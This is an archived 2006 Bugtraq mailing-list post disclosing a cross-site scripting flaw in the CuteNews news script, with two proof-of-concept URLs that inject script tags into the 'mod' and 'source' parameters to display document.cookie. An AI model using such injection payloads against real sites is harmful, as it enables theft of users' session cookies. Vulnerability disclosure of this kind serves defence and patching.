Local XXS Attack On CuteNews

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Local XXS Attack On CuteNews
From: outlaw@xxxxxxxxxxxxxxxxx
Date: 26 Apr 2006 05:07:54 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Local XSS attack:
http://localhost/cutenews/index.php?mod=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!--

http://localhost/cutenews/index.php?mod=editnews&action=list&source=<script>alert
(document.cookie)</script><!--

advisory:http://www.aria-security.net/advisory/portals/cutenews.txt

Prev by Date: [SECURITY] [DSA 1044-1] New Mozilla Firefox packages fix several vulnerabilities
Next by Date: Open Bulletin Board < Multiple Vulnerability
Previous by thread: XXS Attack On FarsiNews
Next by thread: Open Bulletin Board < Multiple Vulnerability
Index(es):
- Date
- Thread